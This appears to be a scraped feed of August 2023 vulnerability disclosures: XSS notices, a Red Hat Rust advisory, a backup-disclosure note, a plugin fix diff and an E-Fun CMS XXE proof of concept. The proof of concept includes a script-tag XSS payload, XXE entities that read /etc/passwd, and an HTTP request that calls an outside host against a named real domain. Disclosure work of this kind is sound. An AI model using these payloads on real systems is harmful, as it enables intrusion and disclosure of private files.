Blood Donor Management System version 1.0 suffers from a persistent cross site scripting vulnerability.

    # Exploit Title: Blood Donor Management System - Stored XSS# Application: Blood Donor Management System# Version: v1.0   # Bugs:  Stored XSS# Technology: PHP# Vendor Homepage: https://phpgurukul.com/# Software Link: https://phpgurukul.com/blood-donor-management-system-using-codeigniter/# Date: 15.08.2023# Author: Ehlullah Albayrak# Tested on: Windows#POC========================================1. Login to user account2. Go to Profile 3. Change "State" input and add "<script>alert("xss")</script>" payload.4. Go to http://localhost/blood/welcome page and search "O", XSS will be triggered.#Payload: <script>alert("xss")</script>

Blood Donor Management System 1.0 Cross Site Scripting

Red Hat Security Advisory 2023-4651-01 - Rust Toolset provides the Rust programming language compiler rustc, the cargo build tool and dependency manager, and required libraries.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

=====================================================================  
                   Red Hat Security Advisory

Synopsis:          Important: rust-toolset-1.66-rust security update  
Advisory ID:       RHSA-2023:4651-01  
Product:           Red Hat Developer Tools  
Advisory URL:      https://access.redhat.com/errata/RHSA-2023:4651  
Issue date:        2023-08-15  
CVE Names:         CVE-2023-38497   
=====================================================================

1. Summary:

An update for rust-toolset-1.66-rust is now available for Red Hat Developer  
Tools.

Red Hat Product Security has rated this update as having a security impact  
of Important. A Common Vulnerability Scoring System (CVSS) base score,  
which gives a detailed severity rating, is available for each vulnerability  
from the CVE link(s) in the References section.

2. Relevant releases/architectures:

Red Hat Developer Tools for Red Hat Enterprise Linux Server (v. 7) - noarch, ppc64, ppc64le, s390x, x86_64  
Red Hat Developer Tools for Red Hat Enterprise Linux Workstation (v. 7) - noarch, x86_64

3. Description:

Rust Toolset provides the Rust programming language compiler rustc, the  
cargo build tool and dependency manager, and required libraries.

Security Fix(es):

* rust-cargo: cargo does not respect the umask when extracting dependencies  
(CVE-2023-38497)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

4. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, refer to:

https://access.redhat.com/articles/11258

5. Bugs fixed (https://bugzilla.redhat.com/):

2228038 - CVE-2023-38497 rust-cargo: cargo does not respect the umask when extracting dependencies

6. Package List:

Red Hat Developer Tools for Red Hat Enterprise Linux Server (v. 7):

Source:  
rust-toolset-1.66-rust-1.66.1-2.el7_9.src.rpm

noarch:  
rust-toolset-1.66-rust-debugger-common-1.66.1-2.el7_9.noarch.rpm  
rust-toolset-1.66-rust-gdb-1.66.1-2.el7_9.noarch.rpm  
rust-toolset-1.66-rust-lldb-1.66.1-2.el7_9.noarch.rpm  
rust-toolset-1.66-rust-src-1.66.1-2.el7_9.noarch.rpm

ppc64:  
rust-toolset-1.66-cargo-1.66.1-2.el7_9.ppc64.rpm  
rust-toolset-1.66-clippy-1.66.1-2.el7_9.ppc64.rpm  
rust-toolset-1.66-rust-1.66.1-2.el7_9.ppc64.rpm  
rust-toolset-1.66-rust-analysis-1.66.1-2.el7_9.ppc64.rpm  
rust-toolset-1.66-rust-analyzer-1.66.1-2.el7_9.ppc64.rpm  
rust-toolset-1.66-rust-debuginfo-1.66.1-2.el7_9.ppc64.rpm  
rust-toolset-1.66-rust-doc-1.66.1-2.el7_9.ppc64.rpm  
rust-toolset-1.66-rust-std-static-1.66.1-2.el7_9.ppc64.rpm  
rust-toolset-1.66-rustfmt-1.66.1-2.el7_9.ppc64.rpm

ppc64le:  
rust-toolset-1.66-cargo-1.66.1-2.el7_9.ppc64le.rpm  
rust-toolset-1.66-clippy-1.66.1-2.el7_9.ppc64le.rpm  
rust-toolset-1.66-rust-1.66.1-2.el7_9.ppc64le.rpm  
rust-toolset-1.66-rust-analysis-1.66.1-2.el7_9.ppc64le.rpm  
rust-toolset-1.66-rust-analyzer-1.66.1-2.el7_9.ppc64le.rpm  
rust-toolset-1.66-rust-debuginfo-1.66.1-2.el7_9.ppc64le.rpm  
rust-toolset-1.66-rust-doc-1.66.1-2.el7_9.ppc64le.rpm  
rust-toolset-1.66-rust-std-static-1.66.1-2.el7_9.ppc64le.rpm  
rust-toolset-1.66-rustfmt-1.66.1-2.el7_9.ppc64le.rpm

s390x:  
rust-toolset-1.66-cargo-1.66.1-2.el7_9.s390x.rpm  
rust-toolset-1.66-clippy-1.66.1-2.el7_9.s390x.rpm  
rust-toolset-1.66-rust-1.66.1-2.el7_9.s390x.rpm  
rust-toolset-1.66-rust-analysis-1.66.1-2.el7_9.s390x.rpm  
rust-toolset-1.66-rust-analyzer-1.66.1-2.el7_9.s390x.rpm  
rust-toolset-1.66-rust-debuginfo-1.66.1-2.el7_9.s390x.rpm  
rust-toolset-1.66-rust-doc-1.66.1-2.el7_9.s390x.rpm  
rust-toolset-1.66-rust-std-static-1.66.1-2.el7_9.s390x.rpm  
rust-toolset-1.66-rustfmt-1.66.1-2.el7_9.s390x.rpm

x86_64:  
rust-toolset-1.66-cargo-1.66.1-2.el7_9.x86_64.rpm  
rust-toolset-1.66-clippy-1.66.1-2.el7_9.x86_64.rpm  
rust-toolset-1.66-rust-1.66.1-2.el7_9.x86_64.rpm  
rust-toolset-1.66-rust-analysis-1.66.1-2.el7_9.x86_64.rpm  
rust-toolset-1.66-rust-analyzer-1.66.1-2.el7_9.x86_64.rpm  
rust-toolset-1.66-rust-debuginfo-1.66.1-2.el7_9.x86_64.rpm  
rust-toolset-1.66-rust-doc-1.66.1-2.el7_9.x86_64.rpm  
rust-toolset-1.66-rust-std-static-1.66.1-2.el7_9.x86_64.rpm  
rust-toolset-1.66-rustfmt-1.66.1-2.el7_9.x86_64.rpm

Red Hat Developer Tools for Red Hat Enterprise Linux Workstation (v. 7):

Source:  
rust-toolset-1.66-rust-1.66.1-2.el7_9.src.rpm

noarch:  
rust-toolset-1.66-rust-debugger-common-1.66.1-2.el7_9.noarch.rpm  
rust-toolset-1.66-rust-gdb-1.66.1-2.el7_9.noarch.rpm  
rust-toolset-1.66-rust-lldb-1.66.1-2.el7_9.noarch.rpm  
rust-toolset-1.66-rust-src-1.66.1-2.el7_9.noarch.rpm

x86_64:  
rust-toolset-1.66-cargo-1.66.1-2.el7_9.x86_64.rpm  
rust-toolset-1.66-clippy-1.66.1-2.el7_9.x86_64.rpm  
rust-toolset-1.66-rust-1.66.1-2.el7_9.x86_64.rpm  
rust-toolset-1.66-rust-analysis-1.66.1-2.el7_9.x86_64.rpm  
rust-toolset-1.66-rust-analyzer-1.66.1-2.el7_9.x86_64.rpm  
rust-toolset-1.66-rust-debuginfo-1.66.1-2.el7_9.x86_64.rpm  
rust-toolset-1.66-rust-doc-1.66.1-2.el7_9.x86_64.rpm  
rust-toolset-1.66-rust-std-static-1.66.1-2.el7_9.x86_64.rpm  
rust-toolset-1.66-rustfmt-1.66.1-2.el7_9.x86_64.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2023-38497  
https://access.redhat.com/security/updates/classification/#important

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2023 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIcBAEBCAAGBQJk2uDAAAoJENzjgjWX9erEaSgP/2gn/rFD6+e48xJoIeXSydES  
JJQkdPZPocfZin6bb62eJAOV8GcsHN45m0FxSSX6NRQb9Av4R4ksCPo8M2ftRvRO  
G4xy6I/ym5TSGvyWFkRxdnD1thYWyDnC83D0dnZEii/d2+7wjISreM5PKURJ/zYx  
j8GSZia8yT1znUEJd25xhPp/NNf6O8l4q67InXWEKULKQtgkJevM87wDKoSMD7Tg  
vUsTIK7941KScUw4QrfkHA6zu0aLGr3HLot57wUI+1whWC730SEDt8HGZkMAe8y1  
FBpxqBRFULbEk6DRwvvbmk2wFROXDKBzcgJB3tUUCynVRLLglEf2U/Sp8kjPu9Ij  
h7WH2Urr+gRj+iI3HWtE/M1NIUF0HDCT4PqwYCiskZ2jORpGO+4OTy4lyf3GBSed  
8zhfjfASfQBGMF9JCYKbGzH1THFqVwnNwndvKdR/DZcKi6aomcUf/X5sRm8zLNDt  
jGw2o/BKibScrmZXM8dIigGxPX02k259rDfVJrWl6TIqAtImKxsyTO2M1qDU0kWh  
4Mbsv4T5WlBn4Tp9RBdD44uUdL8ZYMXtn6msL2RUTwtcSm/tGL1OE6NkA0I4LVde  
Zr9NKOe13vH6BU5oJgU4jLdKptYtylEWHJ2uAsgA1c0+58frnbFah+yjEU24VL88  
bS3EcqdJYl2QIGy5nyDM  
=0C7F  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2023-4651-01

eLitius version 1.0 appears to leave backups in a world accessible directory under the document root.

**eLitius 1.0 Backup Disclosure**

Posted Aug 15, 2023

Authored by indoushka

eLitius version 1.0 appears to leave backups in a world accessible directory under the document root.

tags | exploit, root, info disclosure

SHA-256 | 37a6ad9ab40e37e23d7cbfe01ee9334c417b3339776c4691b7ae872e89ddb896

Download | Favorite | View

**eLitius 1.0 Backup Disclosure**

    ====================================================================================================================================| # Title     : eLitius v1.0 Backup Disclosure Vulnerability                                                                       || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 65.0(32-bit)                                               | | # Vendor    : https://elitius.com/download/eLitius_v_1_0.tar.gz                                                                  |  ====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] appears to leave backups in a world accessible directory under the document root.[+] Use payload : /backup/[+] http://wingro/cmim/backup/Greetings to :=================================================================jericho * Larry W. Cashdollar * shadow_00715 * LiquidWorm * Hussin-X * D4NB4R |===============================================================================

**File Tags**

*   ActiveX (932)
*   Advisory (81,960)
*   Arbitrary (16,198)
*   BBS (2,859)
*   Bypass (1,740)
*   CGI (1,026)
*   Code Execution (7,277)
*   Conference (679)
*   Cracker (841)
*   CSRF (3,345)
*   DoS (23,432)
*   Encryption (2,370)
*   Exploit (51,887)
*   File Inclusion (4,222)
*   File Upload (973)
*   Firewall (821)
*   Info Disclosure (2,773)
*   Intrusion Detection (892)
*   Java (3,043)
*   JavaScript (858)
*   Kernel (6,674)
*   Local (14,452)
*   Magazine (586)
*   Overflow (12,691)
*   Perl (1,423)
*   PHP (5,146)
*   Proof of Concept (2,338)
*   Protocol (3,602)
*   Python (1,535)
*   Remote (30,773)
*   Root (3,582)
*   Rootkit (508)
*   Ruby (612)
*   Scanner (1,640)
*   Security Tool (7,887)
*   Shell (3,181)
*   Shellcode (1,214)
*   Sniffer (894)
*   Spoof (2,206)
*   SQL Injection (16,372)
*   TCP (2,406)
*   Trojan (687)
*   UDP (893)
*   Virus (664)
*   Vulnerability (31,775)
*   Web (9,664)
*   Whitepaper (3,749)
*   x86 (962)
*   XSS (17,938)
*   Other

**File Archives**

*   August 2023
*   July 2023
*   June 2023
*   May 2023
*   April 2023
*   March 2023
*   February 2023
*   January 2023
*   December 2022
*   November 2022
*   October 2022
*   September 2022
*   Older

**Systems**

*   AIX (428)
*   Apple (2,002)
*   BSD (373)
*   CentOS (57)
*   Cisco (1,922)
*   Debian (6,815)
*   Fedora (1,692)
*   FreeBSD (1,244)
*   Gentoo (4,322)
*   HPUX (879)
*   iOS (351)
*   iPhone (108)
*   IRIX (220)
*   Juniper (67)
*   Linux (46,457)
*   Mac OS X (686)
*   Mandriva (3,105)
*   NetBSD (256)
*   OpenBSD (485)
*   RedHat (13,727)
*   Slackware (941)
*   Solaris (1,610)
*   SUSE (1,444)
*   Ubuntu (8,816)
*   UNIX (9,290)
*   UnixWare (186)
*   Windows (6,573)
*   Other

eLitius 1.0 Backup Disclosure

A vulnerability was found in phpRecDB 1.3.1. It has been rated as problematic. Affected by this issue is some unknown functionality of the file /index.php. The manipulation of the argument r/view leads to cross site scripting. The attack may be launched remotely. VDB-237194 is the identifier assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.

CVE-2023-4371

E-Fun CMS version 5.0 suffers from an XML external entity injection vulnerability.

====================================================================================================================================  
| # Title     : E-Fun CMS V5.0 XML external entity injection Vulnerability                                                         |  
| # Author    : indoushka                                                                                                          |  
| # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 64.0.2 (32-bit)                                            |  
| # Vendor    : http://www.e-fun.com.tw/                                                                                           |  
====================================================================================================================================

poc :

[+] Dorking İn Google Or Other Search Enggine.

[+] Vulnerability description :

XML supports a facility known as "external entities",   
which instruct an XML processor to retrieve and perform   
an inline include of XML located at a particular URI.   
An external XML entity can be used to append or modify   
the document type declaration (DTD) associated with an   
XML document. An external XML entity can also be used   
to include XML within the content of an XML document. 

Now assume that the XML processor parses data originating   
from a source under attacker control. Most of the time   
the processor will not be validating, but it MAY include   
the replacement text thus initiating an unexpected file   
open operation, or HTTP transfer, or whatever system ids   
the XML processor knows how to access. 

below is a sample XML document that will use this functionality   
to include the contents of a local file (/etc/passwd)

target : http://127.0.0.1/landtopcomtw/webadmin/

<?xml version="1.0" encoding="utf-8"?>  
<!DOCTYPE indoushka [  
  <!ENTITY indoushka SYSTEM "file:///etc/passwd">  
]>  
<xxx>&indoushka;</xxx>

POST /webadmin/_chkpasswd.php HTTP/1.1  
Content-type: text/xml  
Host: landtop.com.tw  
Content-Length: 175  
Connection: Keep-alive  
Accept-Encoding: gzip,deflate  
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21  
Accept: */*

<?xml version="1.0" encoding="utf-8"?>  
<!DOCTYPE dt5fqyt [  
  <!ENTITY dt5fqytent SYSTEM "http://hityjSWv9cxlI.bxss.me/">  
]>  
<_chkpasswd.php>&dt5fqytent;</_chkpasswd.php>

[+] Affected items :

/webadmin/   
/webadmin/_chkpasswd.php   
/webadmin/index.php 

[+] The impact of this vulnerability :

Attacks can include disclosing local files,   
which may contain sensitive data such as passwords   
or private user data, using file: schemes or relative   
paths in the system identifier. Since the attack occurs   
relative to the application processing the XML document,   
an attacker may use this trusted application to pivot   
to other internal systems, possibly disclosing   
other internal content via http(s) requests.

[+] How to fix this vulnerability :

If possible it's recommended to disable parsing of XML external entities.

Greetings to :=========================================================================================================================  
jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr  |  
=======================================================================================================================================

E-Fun CMS 5.0 XML Injection 

Unauth. Reflected Cross-Site Scripting (XSS) vulnerability in CodeFlavors Vimeotheque: Vimeo WordPress Plugin <= 2.2.1 versions.

**Solution**

 Fixed

Update the WordPress Vimeotheque plugin to the latest available version (at least 2.2.2).

Ivy (TOOR, LISA) discovered and reported this Cross Site Scripting (XSS) vulnerability in WordPress Vimeotheque Plugin. This could allow a malicious actor to inject malicious scripts, such as redirects, advertisements, and other HTML payloads into your website which will be executed when guests visit your site. This vulnerability has been fixed in version 2.2.2.

**No other known vulnerabilities for this plugin**Report

**WordPress plugin developer?**

Start a free security program for your WordPress plugins or request an audit.

Apply for MVDP

**Security researcher?**

Report to Patchstack Alliance bounty platform and earn monthly cash prizes.

Learn more

CVE-2023-30498: WordPress Vimeotheque plugin <= 2.2.1 - Reflected Cross Site Scripting (XSS) vulnerability - Patchstack

Unauth. Reflected Cross-Site Scripting (XSS) vulnerability in WPGem WooCommerce Easy Duplicate Product plugin <= 0.3.0.0 versions.

**Solution**

 Fixed

Update the WordPress WooCommerce Easy Duplicate Product plugin to the latest available version (at least 0.3.0.1).

Nguyen Xuan Chien discovered and reported this Cross Site Scripting (XSS) vulnerability in WordPress WooCommerce Easy Duplicate Product Plugin. This could allow a malicious actor to inject malicious scripts, such as redirects, advertisements, and other HTML payloads into your website which will be executed when guests visit your site. This vulnerability has been fixed in version 0.3.0.1.

**No other known vulnerabilities for this plugin**Report

**WordPress plugin developer?**

Start a free security program for your WordPress plugins or request an audit.

Apply for MVDP

**Security researcher?**

Report to Patchstack Alliance bounty platform and earn monthly cash prizes.

Learn more

CVE-2023-30747: WordPress WooCommerce Easy Duplicate Product plugin <= 0.3.0.0 - Reflected Cross Site Scripting (XSS) vulnerability - Patchstack

Auth. (contributor+) Stored Cross-Site Scripting (XSS) vulnerability in Blubrry PowerPress Podcasting plugin by Blubrry plugin <= 10.0.1 versions.

**Solution**

 Fixed

Update the WordPress PowerPress Podcasting plugin to the latest available version (at least 10.0.2).

Found this useful? Thank Mika for reporting this vulnerability. Buy a coffee ☕

Mika discovered and reported this Cross Site Scripting (XSS) vulnerability in WordPress PowerPress Podcasting Plugin. This could allow a malicious actor to inject malicious scripts, such as redirects, advertisements, and other HTML payloads into your website which will be executed when guests visit your site. This vulnerability has been fixed in version 10.0.2.

**Other vulnerabilities in this plugin**

 0 present

 7 patched

View all

**WordPress plugin developer?**

Start a free security program for your WordPress plugins or request an audit.

Apply for MVDP

**Security researcher?**

Report to Patchstack Alliance bounty platform and earn monthly cash prizes.

Learn more

CVE-2023-30778: WordPress PowerPress Podcasting plugin by Blubrry plugin <= 10.0.1 - Cross Site Scripting (XSS) vulnerability - Patchstack

The User Submitted Posts plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the ‘user-submitted-content’ parameter in versions up to, and including, 20230809 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.

Timestamp:

08/11/2023 10:14:44 PM (10 days ago)

specialk

Message:

Updates plugin to version 20230811  

Location:

user-submitted-posts

Files:

  

*   tags/20230811 _(copied from user-submitted-posts/trunk)_
*   tags/20230811/library/plugin-display.php (1 diff)
*   tags/20230811/library/shortcode-misc.php (3 diffs)
*   tags/20230811/readme.txt (2 diffs)
*   tags/20230811/user-submitted-posts.php (2 diffs)
*   trunk/library/plugin-display.php (1 diff)
*   trunk/library/shortcode-misc.php (3 diffs)
*   trunk/readme.txt (2 diffs)
*   trunk/user-submitted-posts.php (2 diffs)

**Legend:**

Unmodified

Added

Removed

*   **user-submitted-posts/tags/20230811/library/plugin-display.php**
    
    r2944386
    
    r2952471
    
     
    
    739
    
    739
    
    <pre>class  = classes for the parent element (optional, default: none)
    
    740
    
    740
    
    value  = link text (optional, default: "Reset form")
    
    741
    
     
    
    url    = the URL where your form is displayed (required, default: none)
    
    742
    
     
    
    custom = any attributes or custom code for the link element (optional, default: none)</pre>
    
     
    
    741
    
    url    = the URL where your form is displayed (required, default: none)</pre>
    
    743
    
    742
    
                                    <p><?php esc\_html\_e('Note that the url attribute accepts', 'usp'); ?> <code>%%current%%</code> <?php esc\_html\_e('to get the current URL.', 'usp'); ?></p>
    
    744
    
    743
    
                                </div>
    
*   **user-submitted-posts/tags/20230811/library/shortcode-misc.php**
    
    r2951862
    
    r2952471
    
     
    
    9
    
    9
    
            value  = link text (optional, default: "Reset form")
    
    10
    
    10
    
            url    = the URL where your form is displayed (can use %%current%% for current URL)
    
    11
    
     
    
            custom = any attributes or custom code for the link element
    
    12
    
    11
    
       
    
    13
    
    12
    
    \*/
    
    …
    
    …
    
     
    
    15
    
    14
    
       
    
    16
    
    15
    
        extract(shortcode\_atts(array(
    
    17
    
     
    
            'class'  => '',
    
    18
    
     
    
            'value'  => \_\_('Reset form', 'usp'),
    
    19
    
     
    
            'url'    => '#please-check-shortcode',
    
    20
    
     
    
            'custom' => '',
    
     
    
    16
    
            'class' => '',
    
     
    
    17
    
            'value' => \_\_('Reset form', 'usp'),
    
     
    
    18
    
            'url'   => '#please-check-shortcode',
    
    21
    
    19
    
        ), $args));
    
    22
    
    20
    
       
    
    …
    
    …
    
     
    
    35
    
    33
    
        $class = empty($class) ? '' : ' class="'. esc\_attr($class) .'"';
    
    36
    
    34
    
       
    
    37
    
     
    
        $output = '<p'. $class .'><a href="'. esc\_url($href) .'"'. esc\_attr($custom) .'\>'. esc\_html($value) .'</a></p>';
    
     
    
    35
    
        $output = '<p'. $class .'><a href="'. esc\_url($href) .'"\>'. esc\_html($value) .'</a></p>';
    
    38
    
    36
    
       
    
    39
    
    37
    
        return $output;
    
*   **user-submitted-posts/tags/20230811/readme.txt**
    
    r2951862
    
    r2952471
    
     
    
    11
    
    11
    
    Requires at least: 4.6
    
    12
    
    12
    
    Tested up to: 6.3
    
    13
    
     
    
    Stable tag: 20230809
    
    14
    
     
    
    Version:    20230809
    
     
    
    13
    
    Stable tag: 20230811
    
     
    
    14
    
    Version:    20230811
    
    15
    
    15
    
    Requires PHP: 5.6.20
    
    16
    
    16
    
    Text Domain: usp
    
    …
    
    …
    
     
    
    819
    
    819
    
    820
    
    820
    
     
    
    821
    
    \*\*20230811\*\*
    
     
    
    822
    
     
    
    823
    
    \* Removes \`$custom\` variable from \`usp\_reset\_button\_shortcode()\`
    
     
    
    824
    
    \* Tests on WordPress 6.3
    
     
    
    825
    
    821
    
    826
    
    \*\*20230809\*\*
    
    822
    
    827
    
*   **user-submitted-posts/tags/20230811/user-submitted-posts.php**
    
    r2951862
    
    r2952471
    
     
    
    11
    
    11
    
        Requires at least: 4.6
    
    12
    
    12
    
        Tested up to: 6.3
    
    13
    
     
    
        Stable tag: 20230809
    
    14
    
     
    
        Version:    20230809
    
     
    
    13
    
        Stable tag: 20230811
    
     
    
    14
    
        Version:    20230811
    
    15
    
    15
    
        Requires PHP: 5.6.20
    
    16
    
    16
    
        Text Domain: usp
    
    …
    
    …
    
     
    
    39
    
    39
    
    40
    
    40
    
    if (!defined('USP\_WP\_VERSION')) define('USP\_WP\_VERSION', '4.6');
    
    41
    
     
    
    if (!defined('USP\_VERSION'))    define('USP\_VERSION', '20230809');
    
     
    
    41
    
    if (!defined('USP\_VERSION'))    define('USP\_VERSION', '20230811');
    
    42
    
    42
    
    if (!defined('USP\_PLUGIN'))     define('USP\_PLUGIN', esc\_html\_\_('User Submitted Posts', 'usp'));
    
    43
    
    43
    
    if (!defined('USP\_FILE'))       define('USP\_FILE', plugin\_basename(\_\_FILE\_\_));
    
*   **user-submitted-posts/trunk/library/plugin-display.php**
    
    r2944386
    
    r2952471
    
     
    
    739
    
    739
    
    <pre>class  = classes for the parent element (optional, default: none)
    
    740
    
    740
    
    value  = link text (optional, default: "Reset form")
    
    741
    
     
    
    url    = the URL where your form is displayed (required, default: none)
    
    742
    
     
    
    custom = any attributes or custom code for the link element (optional, default: none)</pre>
    
     
    
    741
    
    url    = the URL where your form is displayed (required, default: none)</pre>
    
    743
    
    742
    
                                    <p><?php esc\_html\_e('Note that the url attribute accepts', 'usp'); ?> <code>%%current%%</code> <?php esc\_html\_e('to get the current URL.', 'usp'); ?></p>
    
    744
    
    743
    
                                </div>
    
*   **user-submitted-posts/trunk/library/shortcode-misc.php**
    
    r2951862
    
    r2952471
    
     
    
    9
    
    9
    
            value  = link text (optional, default: "Reset form")
    
    10
    
    10
    
            url    = the URL where your form is displayed (can use %%current%% for current URL)
    
    11
    
     
    
            custom = any attributes or custom code for the link element
    
    12
    
    11
    
       
    
    13
    
    12
    
    \*/
    
    …
    
    …
    
     
    
    15
    
    14
    
       
    
    16
    
    15
    
        extract(shortcode\_atts(array(
    
    17
    
     
    
            'class'  => '',
    
    18
    
     
    
            'value'  => \_\_('Reset form', 'usp'),
    
    19
    
     
    
            'url'    => '#please-check-shortcode',
    
    20
    
     
    
            'custom' => '',
    
     
    
    16
    
            'class' => '',
    
     
    
    17
    
            'value' => \_\_('Reset form', 'usp'),
    
     
    
    18
    
            'url'   => '#please-check-shortcode',
    
    21
    
    19
    
        ), $args));
    
    22
    
    20
    
       
    
    …
    
    …
    
     
    
    35
    
    33
    
        $class = empty($class) ? '' : ' class="'. esc\_attr($class) .'"';
    
    36
    
    34
    
       
    
    37
    
     
    
        $output = '<p'. $class .'><a href="'. esc\_url($href) .'"'. esc\_attr($custom) .'\>'. esc\_html($value) .'</a></p>';
    
     
    
    35
    
        $output = '<p'. $class .'><a href="'. esc\_url($href) .'"\>'. esc\_html($value) .'</a></p>';
    
    38
    
    36
    
       
    
    39
    
    37
    
        return $output;
    
*   **user-submitted-posts/trunk/readme.txt**
    
    r2951862
    
    r2952471
    
     
    
    11
    
    11
    
    Requires at least: 4.6
    
    12
    
    12
    
    Tested up to: 6.3
    
    13
    
     
    
    Stable tag: 20230809
    
    14
    
     
    
    Version:    20230809
    
     
    
    13
    
    Stable tag: 20230811
    
     
    
    14
    
    Version:    20230811
    
    15
    
    15
    
    Requires PHP: 5.6.20
    
    16
    
    16
    
    Text Domain: usp
    
    …
    
    …
    
     
    
    819
    
    819
    
    820
    
    820
    
     
    
    821
    
    \*\*20230811\*\*
    
     
    
    822
    
     
    
    823
    
    \* Removes \`$custom\` variable from \`usp\_reset\_button\_shortcode()\`
    
     
    
    824
    
    \* Tests on WordPress 6.3
    
     
    
    825
    
    821
    
    826
    
    \*\*20230809\*\*
    
    822
    
    827
    
*   **user-submitted-posts/trunk/user-submitted-posts.php**
    
    r2951862
    
    r2952471
    
     
    
    11
    
    11
    
        Requires at least: 4.6
    
    12
    
    12
    
        Tested up to: 6.3
    
    13
    
     
    
        Stable tag: 20230809
    
    14
    
     
    
        Version:    20230809
    
     
    
    13
    
        Stable tag: 20230811
    
     
    
    14
    
        Version:    20230811
    
    15
    
    15
    
        Requires PHP: 5.6.20
    
    16
    
    16
    
        Text Domain: usp
    
    …
    
    …
    
     
    
    39
    
    39
    
    40
    
    40
    
    if (!defined('USP\_WP\_VERSION')) define('USP\_WP\_VERSION', '4.6');
    
    41
    
     
    
    if (!defined('USP\_VERSION'))    define('USP\_VERSION', '20230809');
    
     
    
    41
    
    if (!defined('USP\_VERSION'))    define('USP\_VERSION', '20230811');
    
    42
    
    42
    
    if (!defined('USP\_PLUGIN'))     define('USP\_PLUGIN', esc\_html\_\_('User Submitted Posts', 'usp'));
    
    43
    
    43
    
    if (!defined('USP\_FILE'))       define('USP\_FILE', plugin\_basename(\_\_FILE\_\_));
    

**Note:** See TracChangeset for help on using the changeset viewer.

CVE-2023-4308: Changeset 2952471 for user-submitted-posts – WordPress Plugin Repository

Cross-site Scripting (XSS) - Reflected in GitHub repository librenms/librenms 23.7.0 and prior. A patch is available at commit 91c57a1ee54631e071b6b0c952d99c8ee892e824 and anticiapted to be part of version 23.8.0.

**LibreNMS Cross-site Scripting vulnerability**

High severity GitHub Reviewed Published Aug 15, 2023 to the GitHub Advisory Database • Updated Aug 15, 2023

Tag

#xss